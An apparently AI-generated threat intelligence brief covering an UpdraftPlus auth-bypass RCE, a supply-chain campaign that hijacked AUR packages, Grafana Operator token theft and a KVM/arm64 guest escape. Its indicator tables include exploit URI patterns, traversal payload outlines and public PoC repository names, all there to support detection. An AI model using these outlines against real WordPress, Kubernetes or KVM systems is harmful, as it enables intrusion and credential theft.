Cyber Threat Brief — June 15 2026
⚠️ This report is AI-generated. Always validate findings.
1. UpdraftPlus Auth Bypass to RCE — CVE-2026-10795
TL;DR: Unauthenticated auth bypass in UpdraftPlus (<= 1.26.4) lets attackers forge admin RPC commands and upload malicious plugins for RCE. ~5,000 attacks blocked daily across 3M+ active installations.
What’s New:
- Signature verification bypass via crafted message format collapses encryption key to predictable all-zero value
- Forged
UpdraftCentralRPC commands execute as connected admin — plugin upload → shell - Wordfence blocked ~5,000 exploitation attempts in single day (June 14 data)
- Public PoC on GitHub (
izxci/CVE-2026-10795) - Fixed in UpdraftPlus 1.26.5 (released June 3)
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
POST /wp-admin/admin-ajax.php with action=updraft_central_localkeys_* | URI pattern | T1190 | WAF / access logs | Block unauthenticated requests to UpdraftCentral endpoints |
Malicious plugin upload via udrpc handler | Behavior | T1505.004 | WordPress audit log | Alert on plugin install without admin session |
izxci/CVE-2026-10795 PoC payload patterns | Exploit code | T1190 | IDS/IPS | Deploy signature for forged RPC message format |
| New admin user creation post-exploit | Behavior | T1136.001 | WordPress user table / WP-CLI | Hunt for unexpected admin accounts |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No UpdraftPlus-specific rule; need WAF/proxy detection for updraft_central AJAX actions |
| Elastic | None | No coverage; generic webshell rules may catch post-exploitation |
| Sigma | None | No rule; community contribution needed for WordPress RPC abuse pattern |
Sources: SecurityOnline | Threat-Modeling.com Advisory | GitHub PoC
2. Arch Linux AUR “Atomic Arch” Supply Chain — eBPF Rootkit + Rust Infostealer
TL;DR: Threat actors hijacked 400+ orphaned AUR packages (expanded to 1,500+ in second wave) to deliver a Rust infostealer and eBPF rootkit via modified PKGBUILD files. Official Arch repos unaffected.
What’s New:
- Attackers claimed orphaned AUR packages via standard adoption process, modified PKGBUILDs
- First wave: 408 packages (June 11); second wave: 1,500+ packages (June 12)
- Rust-based infostealer exfiltrates credentials and tokens
- eBPF rootkit hooks
getdents64to hide systemd service files fromls - Sonatype tracking as Sonatype-2026-003775 (CVSS 8.7)
- Community detection tool:
lenucksi/aur-malware-checkon GitHub
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| Modified PKGBUILD files with external fetch URLs | Supply chain | T1195.001 | Package build logs | Audit all AUR packages built since June 10 |
eBPF programs hooking getdents64 syscall | Rootkit behavior | T1014 | bpftool prog list / auditd | Hunt for unexpected eBPF programs on Arch systems |
| Systemd service files hidden by rootkit | Persistence | T1543.002 | find /etc/systemd/system (bypass ls) | Use find not ls to enumerate services |
| Rust binary credential stealer | Malware | T1555 | EDR / process monitoring | Alert on unknown Rust binaries spawned from makepkg |
lenucksi/aur-malware-check | Detection tool | — | — | Run against all Arch/AUR systems |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No Linux AUR/package manager abuse detection |
| Elastic | Linux Suspicious eBPF Program Load (generic) | Need specific rule for rootkit-style getdents64 hooks |
| Sigma | None | Community tool available but no Sigma rule for PKGBUILD tampering |
Sources: BleepingComputer | The Hacker News | GitHub Detection Tool
3. Grafana Operator K8s Privilege Escalation — CVE-2026-11769
TL;DR: Critical path traversal in Grafana Operator (<= 5.23) lets any user who can create Dashboard or LibraryPanel CRDs steal the operator’s Kubernetes service account token and escalate privileges cluster-wide.
What’s New:
- Jsonnet evaluation in operator manager pod allows path traversal to read SA token
- Operator runs with elevated cluster RBAC — token theft = cluster compromise
- Disclosed June 13, fixed in Grafana Operator 5.24.0
- No ITW exploitation confirmed yet, but trivial to exploit with CRD create permissions
- Widely deployed in K8s observability stacks
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
Dashboard/LibraryPanel CRDs with jsonnet import traversal paths | Exploit payload | T1552.007 | K8s audit log | Alert on CRD creates with ../ in jsonnet expressions |
| Grafana Operator SA token access from non-operator pods | Token theft | T1528 | K8s audit log | Monitor SA token usage from unexpected source IPs/pods |
| Grafana Operator versions <= 5.23 | Vulnerable software | — | Asset inventory | Upgrade to 5.24.0 |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No K8s operator-specific path traversal rules |
| Elastic | Kubernetes Suspicious API Request (generic) | Need specific rule for CRD-based path traversal |
| Sigma | None | No coverage for Grafana Operator abuse |
Sources: Grafana Operator v5.24.0 Release | CVE-2026-11769 Details
4. ITScape KVM Guest-to-Host Escape — CVE-2026-46316
TL;DR: First KVM/arm64 guest-to-host escape — race condition in vGIC-ITS emulation gives a guest VM kernel-level code execution on the host. PoC public. Critical for ARM64 cloud providers.
What’s New:
- Race condition in in-kernel vGIC-ITS (Interrupt Translation Service) emulation
- Exploits kernel directly (not QEMU), yielding host kernel compromise
- Researcher V4bel (Hyunwoo Kim) published PoC on GitHub (
V4bel/ITScape) - Affects Linux kernels from April 2024 through early June 2026
- Fixed in commit
13031fb6b835; most distros have patches available - No confirmed ITW exploitation yet, but adaptable for multi-tenant cloud attacks
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| KVM vGIC-ITS race condition exploitation | VM escape | T1611 | Host kernel logs / dmesg | Monitor for unexpected KVM error messages on arm64 hosts |
V4bel/ITScape PoC | Exploit code | T1611 | Threat intel | Patch arm64 KVM hosts immediately |
Kernel versions pre-13031fb6b835 on arm64 | Vulnerable software | — | Asset inventory | Identify and patch all arm64 KVM hypervisors |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No KVM escape detection rules |
| Elastic | None | No arm64 KVM-specific detection |
| Sigma | None | No coverage; need rule for anomalous KVM ITS behavior |
Sources: CybersecurityNews | GitHub PoC | SecurityOnline
Status Updates
- CVE-2026-10520 (Ivanti Sentry): CISA KEV deadline passed yesterday June 14. Post-patch exploitation attempts ongoing per Shadowserver. At least 2 of 19 monitored instances confirmed backdoored. Original brief.
- CVE-2026-35273 (Oracle PeopleSoft): CISA KEV deadline TODAY June 15 (Sunday). ShinyHunters/UNC6240 exploitation ongoing. Rare weekend BOD 26-04 deadline. Original brief.
- CVE-2026-47281 (RoguePlanet — Windows Defender): Still UNPATCHED zero-day. Defender definition 1.453.20.0 detects PoC but does not fix root cause. Original brief.
- CVE-2026-20253 (Splunk Enterprise PostgreSQL Sidecar): PoC public, no ITW exploitation. Patch to 10.2.4/10.0.7+. Original brief.